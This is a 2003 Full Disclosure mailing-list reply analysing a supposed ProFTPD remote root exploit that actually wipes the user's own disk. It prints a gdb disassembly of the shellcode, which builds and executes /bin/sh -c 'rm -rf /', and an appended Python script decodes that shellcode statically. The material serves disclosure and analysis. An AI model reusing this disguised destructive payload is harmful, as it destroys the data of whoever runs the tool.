Full Disclosure mailing list archives

Re: ProFTPD-1.2.9rc2 remote root exploit


From: Simon Kirby <sim () netnation com>
Date: Fri, 24 Oct 2003 08:27:58 -0700

On Fri, Oct 24, 2003 at 03:36:17PM +0200, Andreas Gietl wrote:

On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:

This seems to delete something on the local hard disk. Anybody else seeing this 
effect?

(gdb) disassemble &sc
Dump of assembler code for function sc:
0x0804a1a0 <sc+0>:      xor    %eax,%eax
0x0804a1a2 <sc+2>:      push   %eax
0x0804a1a3 <sc+3>:      push   $0x582f2066
0x0804a1a8 <sc+8>:      push   $0x722d206d
0x0804a1ad <sc+13>:     push   $0x7258632d
0x0804a1b2 <sc+18>:     push   $0x41414141
0x0804a1b7 <sc+23>:     push   $0x41414141
0x0804a1bc <sc+28>:     push   $0x41414141
0x0804a1c1 <sc+33>:     push   $0x41414141
0x0804a1c6 <sc+38>:     push   $0x4368732f
0x0804a1cb <sc+43>:     push   $0x6e69622f
0x0804a1d0 <sc+48>:     xor    %eax,%eax
0x0804a1d2 <sc+50>:     mov    %al,0x7(%esp,1)
0x0804a1d6 <sc+54>:     mov    %al,0x1a(%esp,1)
0x0804a1da <sc+58>:     mov    %al,0x23(%esp,1)
0x0804a1de <sc+62>:     mov    %esp,0x8(%esp,1)
0x0804a1e2 <sc+66>:     xor    %ebx,%ebx
0x0804a1e4 <sc+68>:     lea    0x18(%esp,1),%ebx
0x0804a1e8 <sc+72>:     mov    %ebx,0xc(%esp,1)
0x0804a1ec <sc+76>:     xor    %ebx,%ebx
0x0804a1ee <sc+78>:     lea    0x1b(%esp,1),%ebx
0x0804a1f2 <sc+82>:     mov    %ebx,0x10(%esp,1)
0x0804a1f6 <sc+86>:     mov    %eax,0x14(%esp,1)
0x0804a1fa <sc+90>:     xor    %ebx,%ebx
0x0804a1fc <sc+92>:     mov    %esp,%ebx
0x0804a1fe <sc+94>:     lea    0x8(%esp,1),%ecx
0x0804a202 <sc+98>:     xor    %edx,%edx
0x0804a204 <sc+100>:    lea    0x14(%esp,1),%edx
0x0804a208 <sc+104>:    mov    $0xb,%al
0x0804a20a <sc+106>:    int    $0x80
0x0804a20c <sc+108>:    xor    %ebx,%ebx
0x0804a20e <sc+110>:    xor    %eax,%eax
0x0804a210 <sc+112>:    inc    %eax
0x0804a211 <sc+113>:    int    $0x80
0x0804a213 <sc+115>:    add    %al,(%eax)
End of assembler dump.

Demangles "rm -rf /" and execs it?

Simon-

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
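
Added example (not part of the original message or thread): a way to check the guess above without executing anything, by replaying the dump's push and NUL-store instructions in Python to recover the strings passed to the execve call (syscall 0xb). The function names are hypothetical, and treating the lea-to-%ebx offsets as argv pointers is an assumption that fits this dump only.

```python
import re
import struct

# Instructions copied from the gdb dump in the message above (address column dropped;
# only the lines that build or patch the stack data are kept).
DUMP = """\
xor    %eax,%eax
push   %eax
push   $0x582f2066
push   $0x722d206d
push   $0x7258632d
push   $0x41414141
push   $0x41414141
push   $0x41414141
push   $0x41414141
push   $0x4368732f
push   $0x6e69622f
mov    %al,0x7(%esp,1)
mov    %al,0x1a(%esp,1)
mov    %al,0x23(%esp,1)
lea    0x18(%esp,1),%ebx
lea    0x1b(%esp,1),%ebx
"""

def rebuild_stack(dump):
    """Replay the pushes and NUL stores; return (memory from %esp upward, string offsets)."""
    mem = bytearray()
    offsets = [0]                      # argv[0] is %esp itself (mov %esp,0x8(%esp,1))
    for line in dump.splitlines():
        if m := re.search(r"push\s+\$0x([0-9a-f]+)", line):
            # x86 is little-endian and the stack grows down: newest push sits lowest.
            mem[0:0] = struct.pack("<I", int(m.group(1), 16))
        elif re.search(r"push\s+%eax", line):
            mem[0:0] = b"\x00" * 4     # %eax was zeroed by the preceding xor
        elif m := re.search(r"mov\s+%al,0x([0-9a-f]+)\(%esp", line):
            mem[int(m.group(1), 16)] = 0   # %al is 0: overwrite placeholder byte with NUL
        elif m := re.search(r"lea\s+0x([0-9a-f]+)\(%esp,1\),%ebx", line):
            offsets.append(int(m.group(1), 16))   # assumed to be an argv pointer
    return bytes(mem), offsets

def decode_argv(dump):
    mem, offsets = rebuild_stack(dump)
    return [mem[o:mem.index(b"\x00", o)].decode("ascii") for o in offsets]

if __name__ == "__main__":
    print(decode_argv(DUMP))
```

The 'C' and 'X' bytes in the pushed constants are placeholders that the three mov %al stores replace with NUL terminators, which is why the strings do not appear intact in the raw immediates.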

